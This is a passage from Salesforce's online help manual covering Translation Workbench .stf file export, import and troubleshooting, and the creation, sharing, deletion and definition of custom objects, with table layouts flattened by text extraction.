• Custom App Labels

• Custom Field Help

• Custom Fields

• Custom Report Types

• Data Categories

• Data Category Groups

• Divisions

• Layout Sections

• Lookup Filters
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• Picklist Values

• Record Types

• Related List Labels

• S-Controls

• Solution Categories

• Standard Field Help

• Validation Error Messages

• Web Tabs

• Workflow Tasks

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

See Also:
Setting Up the Translation Workbench

Editing Translation Files
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”

AND

“Customize Application”

To override terms:

You use the following types of files to translate customization labels and review translations:

• Source: Use to translate labels for the first time.

• Untranslated: Use to translate labels after the first translation pass.

• Bilingual: Use to review and edit translations.

Translation files are identified by the extension .stf, to represent the Salesforce translation format. A translation filename
includes the name of the export option used to create it, the language code for the file's content, and a date stamp.

Multiple .stf files created with the Untranslated and Bilingual options are compressed into zip files up to 5 MB in size. If
multiple zip files are needed, the zip filenames are each date stamped and incremented. For example, Untranslated
2010–09–20 05:13 1of2.zip

Warning:  Consider the following when editing your .stf files:

• Don't change the .stf file extension.
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• If you use tabs, new lines, or carriage returns in your text for translation, notice that they are represented with
special characters in the .stf file format. Tabs are \t, new lines are \n and carriage returns are \r. To ensure
consistency between your language versions, ensure these characters are maintained in your translations.

Working with the Source File

Use the Source file to translate an organization's labels for the first time. The Source file contains labels for all of an organization's
translatable customizations in the organization's default language.

If you aren't using a standard translation tool such as Trados, work with the file using an application that supports tabs and
word wrap, such as WordPad or MS Excel.

Note:  If you use MS Excel to enter translations in your .stf file, your file format may be corrupted. MS Excel
automatically adds quotation marks around entries that have commas. We advise you open your files in a text editor
before import and remove these quotation marks if they have been added. The import will fail if these quotation
marks are not removed.

To prepare the Source file for your translators:

• Create one copy of the Source file for each language you are translating into.
• In the header of each Source file, change the language code from the organization's default language (such as en_US) to

the translation language (such as fr).

Tell your translators to replace the untranslated values in the LABEL column with translated values.

Note:  Don't add columns to or remove columns from the translation file.

Edit OptionsDescriptionColumn

Do not editUnique identifiers for labelsKEY

Replace untranslated values with
translated values

Labels that are visible to end usersLABEL

Working with the Untranslated File

Use the Untranslated file to translate labels that haven't been translated. One Untranslated file is generated for each language.
When multiple files are generated, they're exported to a .zip file containing .stf files for each translation language.

If you aren't using a standard translation tool such as Trados, work with the file using an application that supports tabs and
word wrap, such as WordPad or MS Excel.

Note:  If you use MS Excel to enter translations in your .stf file, your file format may be corrupted. MS Excel
automatically adds quotation marks around entries that have commas. We advise you open your files in a text editor
before import and remove these quotation marks if they have been added. The import will fail if these quotation
marks are not removed.

Tell your translators to replace the untranslated values in the LABEL column with translated values.

Note:  Don't add columns to or remove columns from the translation file.
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Edit OptionsDescriptionColumn

Do not editUnique identifiers for labelsKEY

Replace untranslated values with
translated values

Labels that are visible to end usersLABEL

Working with the Bilingual File

Use the Bilingual file to review translations, edit labels that have already been translated, and add translations for labels that
haven't been translated. One Bilingual file is generated for each translation language.

The TRANSLATED section of the file contains the text that has been translated and needs to be reviewed. The
UNTRANSLATED section of the file contains text that hasn't been translated.

Edit the file using an editing application that supports tabs and word wrap, such as WordPad or MS Excel.

Note:  If you use MS Excel to enter translations in your .stf file, your file format may be corrupted. MS Excel
automatically adds quotation marks around entries that have commas. We advise you open your files in a text editor
before import and remove these quotation marks if they have been added. The import will fail if these quotation
marks are not removed.

• Identify labels that are out of date by scrolling through the OUT OF DATE column to locate values that have an asterisk
(*). Update out of date labels as needed.

• Edit translated labels in the TRANSLATION column of the TRANSLATED section.
• Replace untranslated labels with translated values in the LABEL column of the UNTRANSLATED section.
• Delete a translation by replacing the desired value in the TRANSLATION column in either section with a left and right

angle bracket pair (< >). When the Bilingual file is imported, the label reverts to its original value.

Attention:  Don't attempt to delete a translation by deleting a translated label from the file. Deleting a translation
in the file doesn't remove the translation from the application after the file is imported.

Note:  Don't add columns to or remove columns from the translation file.

Edit OptionsDescriptionColumn

Do not editUnique identifiers for labelsKEY

Labels that are visible to end usersLABEL • Do not edit labels in the
TRANSLATED section of the file

• In the UNTRANSLATED section of
the file, replace untranslated labels with
translated values

Current translationTRANSLATION • In the TRANSLATED section of the
file, edit current translations

• In the UNTRANSLATED section of
the file, add translations
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Edit OptionsDescriptionColumn

Do not editIndicates whether the source text has changed
since the previous translation.

The out of date indicators are:

OUT OF DATE

• An asterisk (*): The label is out of date. A
change was made to the default language
label and the translation hasn't been updated.

• A dash (-): The translation is current.

See Also:
Exporting Translation Files
Importing Translated Files

About Updating Translated Terms
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”

AND

“Customize Application”

To override terms:

When translated components are changed, the translated value is marked Out of Date. Translators are responsible for
keeping the translated terms updated.

For example, say you enter a translation for an error message on a lookup filter. Later, you edit the lookup filter and change
the error message. When you go into the Translation Workbench and view the message translation column, it still shows the
translation for the old error message and the checkbox in the Out of Date column is selected.

For best results, have your translators check their translations frequently, and be sure to notify them when changes occur. You
can use the Translation Workbench Export > All feature to generate a list of all the translatable customizations and their
associated Out of Date states.

See Also:
Entering Translated Terms
Adding and Editing Translated Languages and Translators
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Exporting Translation Files
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Translation”

AND

“Customize Application”

AND

“Create Documents”

To export or import translation files

Use Export in the Translation Workbench to create files that contain your organization’s translatable custom metadata, such
as custom fields, report types, and picklist values. Send these files to your outside translators or translation agency for bulk
translation activities, then use Import to update your labels.

1. From Setup, click Translation Workbench > Export.
2. Select which labels you want to export.

• Source–Used as the initial source for creating new translations.

Creates a single file that contains a list of all your translatable customizations. Typically, the content is in your
organization's default language.

• Untranslated–Used to make updates.

Creates a set of files that contain only customizations that have not been translated, including new and modified
customizations.

One file is created for each language. These files are then compressed into .zip files.

• Bilingual–Used for reference and reviewing all your untranslated and translated customizations.

Creates a list of all the translatable labels in their current translated or untranslated state.

One file is created for each language. These files are then compressed into .zip files.

The content in each file is divided into Untranslated and Translated sections. Each translatable label is in either the
Untranslated or Translated section, according to its translation state. In the Translated section, out of date status for
the labels in included.

3. Click Export.

A status message tells you that the export is being processed. When the export is complete an email is sent to the email
address specified in your profile.

4. Locate the exported .stf or .zip file.

Go to Your name > Documents > Document Folders > My Personal Documents > Go!.

All exported files indicate the Export option used to create them and are date and time stamped. Individual files end with
the extension .stf. Multiple files are grouped into .zip files.
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If you have a large number of documents in your personal documents area, you'll find the exported files under the sort
letter:

• B—Bilingual export option, for example: Bilingual_2010-09-23_11:20.zip.
• S—Source export option, for example: Source_en_US_2010-09-23_11:20.stf.
• U—Untranslated export option, for example: Untranslated_2010-09-23_11:20.zip.

5. Save the files for translation by your translators or translation agency.

Click View > Save File > OK. The file is saved to the location specified by your browser. For example,
C:/Users/username/Downloads.

See Also:
Importing Translated Files
Setting Up the Translation Workbench

Importing Translated Files
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Translation”

AND

“Customize Application”

AND

“Create Documents”

To export or import translation files

Use Import in the Translation Workbench to import and update the translations for your organization’s custom metadata,
such as custom fields, report types, and picklist values. Typically, the original files are created through the Export feature, then
sent to your outside translators or translation agency for bulk translation activities and returned to you for importing.

1. Bundle multiple files into .zip files that are no larger than 5 MB. Create multiple .zip files as needed.

The zipped files don't have to be in the same order or grouping as the exported .zip files.

For example, you start with two exported .zip files. The first file includes French, Italian, and Japanese. The second file
includes Russian, Simplified Chinese, and Greek. You can create:

• One .zip file with French, Greek, and Italian.
• One .zip file with Russian and Greek.
• One .zip file with Simplified Chinese.

2. From Setup, click Translation Workbench > Import.
3. Click Browse to locate and select the file you want to import.
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4. Click Import.

After the import is complete:

• The labels are updated with the translations.
• A confirmation email is sent to the email address specified in your profile.

5. Verify the imported changes have been implemented. You can:

• Check labels in your Salesforce organization.
• Check labels through the Translation Workbench.

See Also:
Exporting Translation Files
Setting Up the Translation Workbench

Troubleshooting Issues with Exporting and Importing
Translation Files

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Translation”

AND

“Customize Application”

AND

“Create Documents”

To export or import translation files

Use this table to troubleshoot issues you might encounter while exporting and importing files in the Translation Workbench.

Troubleshooting StepsWhat It MeansError Message

Export your file again and make sure
there are header rows for all sections, and

The header rows of the file you’re trying
to import are missing, or there is

Bilingual File starts with non-section
header row: {0}

that all extraneous text has beenextraneous text (such as notes that aren't
commented out) in those rows. commented out or removed from the

header rows.

Export your file again and make sure that
each key in it is unique, and then
re-import the file.

The specified key appears in your
imported file more than once. Each
translated item needs to have its own
unique key, and each key can only appear
in the file one time.

Duplicate key: {0} exists in import file,
please re-export.
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Troubleshooting StepsWhat It MeansError Message

Export your file again and make sure the
keys in it match those in the file you’re
trying to import.

During translation, Salesforce generates
unique keys, or identifiers, for each
object, picklist value, or page element
you’re translating. If these names or keys

Invalid Key

are changed after you export your file,
Salesforce can’t match the correct key
with the correct name.

Export your file again and make sure
you’re using the correct CRT key format.

One of the keys in your Custom Report
Type (CRT) column is in the wrong
format.

Key: {0} could not be uniquely resolved.
This is caused by a change to our Custom
Report Type Column key format. Please
re-export and use the new key format for
those keys.

Edit your translated labels so they’re
within the character limit listed for the
field type and import your file again.

Each type of field, such as a picklist
value, can only have a certain number of
characters. Your translated labels for the
type of field at the line specified in the
error message are too long.

Maximum character limit {x} for {field
type} translation exceeded in line:

Make sure you’re importing the correct
file, and that it contains translated data.

The file you’re trying to import is empty
or does not contain any translation
changes.

No data to import

Make sure your language code is valid
and isn't missing or commented out.

The file you’re trying to import doesn’t
have a valid language code, or the
language code is in the wrong place.

No language code specified in file header

Make sure your file has section headers
and import it again.

The file you’re trying to import is missing
section headers.

No translated or untranslated section
header found in the bilingual file

Make sure your file has a valid
import/export type in the file header, and
that the header did not get translated.

The file you’re trying to import doesn’t
have a valid import/export type (Source,
Untranslated, or Bilingual) specified in
the file header. The file type should be

No valid file type specified in file header

in the default language for your
organization.

Make sure your file is a .stf or a .zip file
and try importing it again.

You can only import files in .stf format
or .zip files that contain .stf files.

Not a valid file to import. Please select a
.stf or a .zip file for import.

Export your source file and match the
order of the picklist values to your import
file, then import again.

The order of the picklist values in your
source file don’t match your setup.

Some keys are appended with their sort
order for uniqueness. Re-export your file
and ensure that the keys in both files
match.

Edit your data to remove or escape any
extra tabs, newlines, or carriage returns,

The file you’re importing has extra tabs,
new lines, or carriage returns in the line
specified in the error message.

Wrong number of columns in line: {x}.
Check that you have escaped tabs (\\t),
new lines (\\n), and carriage returns (\\r)
in your files.

and make sure the file you’re importing
has the same number of columns as the
file you exported.

Contact Salesforce Customer Support.Salesforce had an unexpected problem
while exporting your file.

Your export request failed. Please retry
or contact support.

2865

Troubleshooting Issues with Exporting and Importing
Translation Files

Customizing Your Organization



Troubleshooting StepsWhat It MeansError Message

Contact Salesforce Customer Support.Salesforce had an unexpected problem
while importing your file.

Your import request failed. Please retry
or contact support.

Add the language you want to use to the
Translation Workbench and import your
file again.

The file you’re trying to import is in a
language you haven’t yet added to the
Translation Workbench.

Your organization does not have
language permissions for {language}.

See Also:
Exporting Translation Files
Importing Translated Files

ENHANCING YOUR OBJECTS, DATA, AND FIELDS

USING CUSTOM OBJECT RECORDS

Custom Object Record Overview
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Custom objects records store information that is unique and important to you and your organization. For example, your
organization may use a custom object called “Quotes” to store data for your company's sales quotes. You can also use custom
objects for custom applications, such as tracking software enhancements in a development life-cycle.

Your administrator first defines the custom object and its properties, such as custom fields, relationships to other types of data,
page layouts, and a custom user interface tab. Once the custom object is created and deployed to users, you can enter data to
create individual custom object records. If your administrator has created a tab for the custom object, the tab displays a home
page that lets you quickly create and locate custom object records. You can also sort and filter your custom object records using
standard and custom list views. In addition, the tab lets you view and edit detailed information on each custom object record
to which you have access.

Administrators, and users with the “Modify All Data” permission, can import custom objects.

See Also:
Custom Objects Home
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Custom Objects Home
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the custom objectTo view a custom object tab:

“Read” on the custom objectTo view custom object records:

Clicking on a custom object tab displays the tab home page. The name of a custom object tab is the plural form of the custom
object as defined by your administrator.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. List views let you display a list of records that match specific criteria, such as all custom objects
for a tab or just the ones you own. To edit or delete any view you created, select it from the View drop-down list and click
Edit.

• If custom objects are shared with external contacts via Salesforce to Salesforce, choose one of the list views under [Custom
Object Name] from Connections to view the custom objects that your business partners have shared with you.

• In the Recent section, select an item from the drop-down list to display a brief list of the top custom object records matching
that criteria. From the list, you can click any custom object name to go directly to the detail. Toggle the Show 25 items
and Show 10 items links to change the number of items that display. The fields you see are determined by the “Custom
Object Tab” search layout defined by your administrator and by your field-level security settings (available in Enterprise,
Unlimited, and Developer Editions only). The key list choices are:

DescriptionRecent Custom Objects Choice

The last ten or twenty-five custom object records you viewed,
with the most recently viewed item listed first. This list is

Recently Viewed

derived from your recent items and includes records owned
by you and other users.

The last ten or twenty-five custom object records you created,
with the most recently created item listed first. This list only
includes records owned by you.

Recently Created

The last ten or twenty-five custom object records you
updated, with the most recently updated item listed first.
This list only includes records owned by you.

Recently Modified
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Note:  If you need information on a specific custom object, please contact your Salesforce administrator about creating
custom help for your custom objects. Salesforce Online Help covers the standard objects provided with the initial
Salesforce integration.

See Also:
Displaying and Editing Custom Object Records
Creating Custom Object Records

Creating Custom Object Records
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the custom objectTo view custom object records:

“Create” on the custom objectTo create custom object records:

To create a new custom object record:

1. Click New.
2. Enter the information for the custom object record.
3. Click Save when you are finished, or click Save & New to save the current record and add another.

If your administrator has defined relationships to other types of records, you can automatically associate the new custom object
with another record. View the other record and select the custom object name from the Create New drop-down list in the
sidebar, or click New Object Name in the custom object related list of the other record.

If your organization uses divisions to segment data, custom objects that are detail objects in a master-detail relationship inherit
their division from the master object. Custom objects that are not related to other records are automatically in the global
division.

See Also:
Custom Object Record Fields
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Cloning Custom Object Records
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on the custom objectTo clone custom object records:

The Clone button on a custom object record quickly creates a new custom object record with the same information as the
existing record.

Note:  When you clone a record, the new record has the record type of the original record. If the record type of the
cloned record isn’t available in your profile or permission sets, the new record adopts your default record type.

To clone a custom object record:

1. Click Clone on an existing custom object record.
2. Enter or change any information for the new record.
3. Click Save.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

Deleting Custom Object Records
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delete” on the custom objectTo delete custom object records:

To delete a custom object record, click Del next to the record on the custom object’s list page or in the custom related list of
an associated record. You can also delete a custom object record by clicking Delete on the custom object record detail page.

When you delete a custom object record, all related events, tasks, notes, and attachments are also deleted. If the custom object
is the master object in a master-detail relationship, any associated detail records are also deleted. If the custom object is the
detail side of a master-detail relationship, any associated records are not deleted.

The deleted custom object record is moved to the Recycle Bin. If you undelete the record, any related items are also restored.

Note:  You can delete a custom object record if you are an administrator, the record owner, or a user above the record
owner in the organization role hierarchy, and if you have the appropriate user permission. Custom objects that are
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on the detail side of a master-detail relationship do not have an Owner field and can be deleted by any user who has
access to edit the associated master record.

See Also:
Overview of Object Relationships

Displaying and Editing Custom Object Records
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the custom objectTo view custom object records:

“Edit” on the custom objectTo change custom object records:

Displaying Custom Object Records

Once you have located a custom object record on the custom objects tab home or list pages, click the custom object
record name to display detailed information.

If the Service Cloud console is set up to include custom objects, select it from the Force.com app menu to find, view,
and edit custom object records and their related items on one screen.

Editing Custom Object Records

To update custom object record details, click Edit, and then change the fields you want to update. When you have
finished, click Save. You can also click Save & New to save the current custom object record and create another. Required
fields are marked with red.

Note:  You cannot change the Object Name or Data Type if the custom object is referenced in Apex.

Custom Object Related Lists

The lower portion of the custom object record detail page provides information related to the custom object record,
including activities, notes, attachments, and any other related records. The related lists you see are determined by your
personal customization, and by any customization your administrator has made to page layouts or your permissions to
view related data. You can click on individual items to display additional detail. Click more at the bottom of the page
or View More below a related list to display more items. Clicking New lets you directly add new items.

Tip:  To help your users see record details and related lists more easily, enable Hover Details in the User Interface
panel of Setup.

Printing Custom Object Records

On a custom object detail page, click Printable View to print the record.
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To return to the last list page you viewed, click Back to list at the top of any custom object record detail page. If your organization
has enabled collapsible page sections, use the arrow icons next to the section headings to expand or collapse each section on
the detail page.

See Also:
Creating Custom Object Records

Sharing Custom Object Records
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the custom objectTo view a custom object record:

The administrator defines the default sharing model for an entire organization. You can change this model to extend sharing
to more users than the default set. However, you cannot change the sharing model to make it more restrictive than the default.

To view and manage sharing details, click Sharing on the custom object record detail page. The Sharing Detail page lists the
users, groups, roles, and territories that have sharing access to the record. On this page, you can:

• Grant access to the record to other users, groups, roles, or territories

Note:  You can’t share a custom object record with another user unless that user has the “Read” permission on
the custom object.

• View all users who have access to the record

• Edit or delete the record’s access level

Searching for Custom Object Records
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the custom objectTo view custom object records:

You can search custom objects just as you can search standard objects in Salesforce.

You can also create a custom object list view to find custom object records that match specific criteria.

Custom object records appear in search results only if they have a custom tab.
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Custom Object Record Fields
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Custom object record fields contain the data you enter for your custom object records. Here is a description of the fields (in
alphabetical order) that make up a custom object record. Some of these fields may not be visible or editable depending on your
page layout and field-level security settings.

Your administrator may also have defined additional custom fields.

DescriptionField

User who created the record.Created By

Currency of the record if multicurrency is enabled.Currency

Division to which the custom object record belongs. Custom
objects that are “detail” objects in a master-detail relationship

Division

inherit their division from the master object. Custom objects
that are not related to other records are automatically in the
global division. Available only in organizations that use
divisions to segment their data.

User who most recently changed the record.Last Modified By

Identifier for the custom object record. This name appears in
page layouts, related lists, lookup dialogs, search results, and

Name

key lists on tab home pages. By default, this field is added to
the custom object page layout as a required field.

Assigned owner of the custom object record. If the custom
object becomes the detail side of a master-detail relationship,

Owner

this field is removed, as ownership of the data is controlled by
the master object, or by the primary master object for a custom
object with two master-detail relationships.

Note: Custom objects on the “detail” side of a
master-detail relationship can't have sharing rules,
manual sharing, or queues, as these require the Owner
field.

See Also:
Custom Objects Home
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Using Custom Related Lists
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the custom object

AND

“Read” on the associated record

To view custom object record related lists:

“Edit” on the custom objectTo change custom object records:

“Create” on the custom objectTo create custom object records:

“Delete” on the custom objectTo delete custom object records:

Custom related lists display on the lower portion of the detail page for another record. They list the custom object records
that are associated with that record.

From a custom related list, you can:

• Click the custom object record name to view detailed information.

• Click Edit or Del to edit or delete the custom object record.

• Click New to create a new custom object record that is associated with the record you are viewing.

Your administrator defines whether a custom object can be related to another type of record via master-detail or lookup
relationships. The administrator also specifies whether a custom related list displays on the page layout of the associated record.
For more information, see Overview of Object Relationships on page 2887.

See Also:
Custom Object Record Overview
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Viewing Custom Object Lists
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the custom objectTo view custom object lists:

“Create” on the custom objectTo create custom object records:

The custom objects list page displays a list of custom object records in your current view. A list view includes custom object
records of one type only; you cannot view more than one type of custom object in a single list view.

• Click a custom object name to view the custom object record detail. Click Edit or Del next to a custom object record name
to edit or delete the record.

• To take ownership of custom object records in a queue, view the queue list view, check the box next to one or more records,
and then click Accept.

Note:  You can view and accept records only from queues you belong to, or if you are higher in the role hierarchy
than a queue member. Administrators, users with the “Modify All” object-level permission for the given object,
and users with the “Modify All Data” permission, can view and take records from any queue.

• To transfer ownership of multiple records at once, select the box next to one or more custom object records and click
Change Owner. Enter the new record owner, optionally select Send Notification Email to send an email to the
new record owner, and click Save.

• Click New Custom Object Name or select the custom object name from the Create New drop-down list in the sidebar
to create a new custom object of that type.

See Also:
Custom Object Record Overview

ADMINISTERING CUSTOM OBJECTS

What is a Custom Object?
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Custom objects are custom database tables that allow you to store information unique to your organization. For example, your
organization may want to create a custom object called Quotes to store data for your company’s sales quotes.
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After you define a custom object, you can:

• Create custom fields.

• Associate the custom object with other records and display the custom object data in custom related lists.

• Track tasks and events for custom object records

• Build page layouts

• Customize the search results and the custom object fields that display in them

• Create a custom tab for the custom object

• Create reports and dashboards to analyze custom object data

• Share your custom objects, custom tabs, custom apps, and any other related components with other Salesforce users on
Force.com AppExchange.

• Import custom object records

See Also:
Tip sheet: Building Custom Objects, Tabs, and Related Lists

Managing Custom Objects
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Managed Packages are not available in Database.com.

User Permissions Needed

“Customize Application”To create and edit custom objects:

After creating your custom objects, you can customize, edit, delete, or truncate them. From Setup, click Create > Objects to
display the Custom Objects list page, which shows the list of custom objects defined for your organization. From the Custom
Objects list page, you can:

• Click New Custom Object to define a custom object.

• Click the object name to display detailed information about the custom object and customize it further.

Optional features you can customize include enabling reports, tracking activities, tracking field history, and making the
object available for the Salesforce Customer Portal.

• To update the custom object definition, click Edit and update the desired fields.

Note:  The Allow Reports and Allow Activities fields are not locked in Managed - Released and can be
changed by the developer in future releases of a managed package.

• To delete a custom object, click Del.
• To truncate a custom object, click Truncate.

• To view deleted custom objects, click the Deleted Objects link. The total number of deleted custom objects for your
organization is listed in parentheses.
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The detail page of the custom object provides information about various characteristics of the object, including standard fields,
custom fields, field history tracking, relationships, custom links, search layouts, page layouts, and object limits. You can:

• Click on individual items to display additional detail.

• Click More at the bottom of the page or View More below a related list to display more items.

• Click New to directly add new items.

Note:  The object limit percentages displayed for items used are truncated, not rounded. For example, if your
organization uses 95.55% of the limit for a particular item, the percentage displayed is 95%.

See Also:
What is a Custom Object?
Modifying Custom Objects
Tip sheet: Building Custom Objects, Tabs, and Related Lists

Custom Objects Deployment Status

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To deploy custom objects:

While developing custom objects, you may not want users to see and interact with a new object. Because users may get frustrated
with changes in layout or lose data when you delete custom fields, control visibility of the new object until you are finished.

Use the Deployment Status setting in the custom object definition to control when users can see and use a custom object
and its associated custom tab, related lists, and reports.

• Choose “In Development” as the Deployment Status when first creating your custom object to hide it from users while
you are designing and testing it. Making the status “In Development” hides the custom object tab, search results, related
lists, and report data types from all users except those with the “Customize Application” permission.

• Change the Deployment Status to “Deployed” when you want to allow all users to use the custom object and any
associated custom tab, related lists, and reports.

• After deploying a custom object, change the Deployment Status back to “In Development” if you want to make more
enhancements to it.

Note: A custom report type's Deployment Status changes from Deployed to In Development if its primary
object is a custom object whose Deployment Status similarly changes.
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Defining Custom Objects

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

S-Controls, Reports, Activities, Divisions, Search, and Custom Tabs are not available in Database.com

User Permissions Needed

"Customize Application"To create and edit custom objects:

Define custom objects to track and store data unique to your organization. To create a custom object:

1. From Setup, click Create > Objects.
2. Click New Custom Object, or click Edit to modify an existing custom object.
3. Enter the following:

DescriptionField

A name used to refer to the object in any user interface pages.Label

The plural name of the object. If you create a tab for this
object, this name is used for the tab.

Plural Label

If it is appropriate for your organization’s default language,
specify the gender of the label. This field appears if the

Gender

organization-wide default language expects gender. Your
personal language preference setting does not affect whether
the field appears. For example, if the organization’s default
language is English and your personal language is French,
you are not prompted for gender when creating a custom
object.

If it is appropriate for your organization’s default language,
check if your label should be preceded by "an" instead of "a."

Starts with a vowel sound

A unique name used to refer to the object when using the
API. In managed packages, this unique name prevents

Object Name

naming conflicts on package installations. The Object Name
field can contain only underscores and alphanumeric
characters. It must be unique, begin with a letter, not include
spaces, not end with an underscore, and not contain two
consecutive underscores.

An optional description of the object. A meaningful
description will help you remember the differences between
your custom objects when you are viewing them in a list.

Description

Defines what displays when users click the Help for this
Page context sensitive help link from the custom object

Context-Sensitive Help Setting

2877

Managing Custom ObjectsEnhancing Your Objects, Data, and Fields



DescriptionField

record home (overview), edit, and detail pages, as well as list
views and related lists. Choose Open the standard
Salesforce Help & Training window if you want to display
the basic Salesforce help available for any custom object
record. Choose Open a window using a Visualforce
page or Open a window using a custom s-control to display
the Visualforce page or s-control you select as the
context-sensitive help link from any custom object record
page.

Note:  The Help & Training link at the top of any
page is not affected by this setting. It always opens
the Salesforce Help & Training window.

The s-control you have defined that contains the help
content for this custom object.

Custom S-Control

The name used in page layouts, list views, related lists, and
search results.

Record Name

The type of field (text or auto-number) for the record name.
Records that have unique IDs instead of names use

Data Type

auto-numbers. An auto-number is a unique number assigned
automatically. It is always a read-only field.

For a Record Name of type auto-number, enter a display
format. You can have up to two sets of curly braces. For

Display Format

more details about display format options, see Custom Field
Attributes on page 2928.

For a Record Name of type auto-number, enter the number
to use when creating your first record for this custom object.

Starting Number

Makes the data in the custom object records available for
reporting purposes.

To create reports on custom objects, choose the Other
Reports report type category unless the custom object has

Allow Reports

a relationship with a standard object. When the custom
object has a master-detail relationship with a standard object,
or is a lookup object on a standard object, select the standard
object for the report type category instead.

Allows users to associate tasks and scheduled calendar events
related to the custom object records.

Allow Activities

If your organization has divisions enabled, select this option
to enable the custom object for divisions. Divisions group

Enable Divisions

records for simplified search results, list views, reports, and
other areas within Salesforce. Salesforce adds a Division
field to the custom object, and if the custom object is the
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DescriptionField

master in a master-detail relationship, any custom objects
on the detail side also get the Division field and inherit
their division from the master record.

Makes the custom object available to all portal users.

This option is available only if your organization has a
customer portal.

Available for Customer Portal

If you turn on Communities in your organization, this option
no longer appears and all custom objects are available for
use in your communities. If, before enabling Communities,
you had a Customer Portal and custom objects without this
option selected, those objects become available for use in
your Customer Portal.

Enables your organization to track changes to fields on the
custom object records, such as who changed the value of a

Track Field History

field, when it was changed, and what the value of the field
was before and after the edit. History data is available for
reporting, so users can easily create audit trail reports when
this feature is enabled.

Indicates whether the custom object is visible to other users.Deployment Status

Allows users to be able to attach notes and attachments to
custom object records. This allows you to attach external

Add Notes & Attachments...

documents to any object record, in much the same way that
you can add a PDF or photo as an attachment to an email.

This option is available only when you are creating a new
object.

Starts the custom tab wizard after you save the custom object.Launch the New Custom Tab Wizard

4. Click Save.

Notes on Custom Objects

Object Permissions
In Enterprise, Unlimited, and Developer Editions, when you create a custom object, the “Read,” “Create,” “Edit,” and
“Delete” permissions for that object are disabled for any profiles in which “View All Data” or “Modify All Data” is
disabled. You can enable access to custom objects in permission sets or custom profiles, and assign them to the users
who need access.

Note:  In Contact Manager, Group, and Professional Editions, when you create a custom object, the “Read,”
“Create,” “Edit,” and “Delete” permissions for that object are enabled for all profiles.
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Sharing Model
The data sharing model for all custom objects is controlled by an organization-wide default setting. For more information,
see Custom Object Security on page 2898.

Delegating Custom Object Administration
After you create a custom object, you can delegate the administration of the custom object to other non-administrator
users.

Queues
After you create a custom object, you can define queues to distribute ownership of custom object records to your users.

Search
Custom object records appear in search results only if they have a custom tab.

See Also:
Overview of Object Relationships
Defining Object-Level Help

Modifying Custom Objects

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize custom objects:

Customize the user interface for your custom objects by:

• Creating a custom tab; see Defining Custom Tabs on page 2837.

• Creating custom fields and relationships; see Defining Custom Object Fields on page 2881.

• Adding customized buttons and links to perform actions or link to other pages or websites; see Defining Custom Buttons
and Links on page 3494.

• Defining which fields display for users on record detail and edit pages; see Building Page Layouts for Custom Objects on
page 2831.

• Specifying which fields display for users in search results, lookup dialogs, and in the key lists on custom object tabs; see
Customizing Search Layouts for Custom Objects on page 2897.

• Creating record types to display different picklist values and page layouts to different users based on their profiles; see
Creating Custom Object Record Types on page 2896.
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Defining Custom Object Fields

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Divisions are not available in Database.com.

User Permissions Needed

“Customize Application”To view and edit standard fields:

“Customize Application”To create custom fields:

Custom object fields store the data for your custom object records.

Custom Fields for Custom Objects

You can create custom fields to store information unique to your organization. You can also create custom relationship
fields to associate your custom object with another object in Salesforce.

Standard Fields for Custom Objects

Custom objects automatically include the following standard fields. Click Edit to modify any of the editable fields.

DescriptionField

User who created the record.Created By

Currency of the record if multicurrency is enabled.Currency

Division to which the custom object record belongs. Custom
objects that are “detail” objects in a master-detail relationship

Division

inherit their division from the master object. Custom objects
that are not related to other records are automatically in the
global division. Available only in organizations that use
divisions to segment their data.

User who most recently changed the record.Last Modified By

Identifier for the custom object record. This name appears in
page layouts, related lists, lookup dialogs, search results, and

Name

key lists on tab home pages. By default, this field is added to
the custom object page layout as a required field.

Assigned owner of the custom object record. If the custom
object becomes the detail side of a master-detail relationship,

Owner

this field is removed, as ownership of the data is controlled by
the master object, or by the primary master object for a custom
object with two master-detail relationships.

Note: Custom objects on the “detail” side of a
master-detail relationship can't have sharing rules,
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DescriptionField

manual sharing, or queues, as these require the Owner
field.

Deleting Custom Objects

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To delete custom objects:

When you delete a custom object, Salesforce does not add it to the Recycle Bin. Instead, deleted objects appear in the Deleted
Objects list for 15 days. During this time, the object and its data are soft deleted, meaning you can restore or permanently erase
(hard delete) the object and its data. After 15 days, the object and its data are automatically hard deleted.

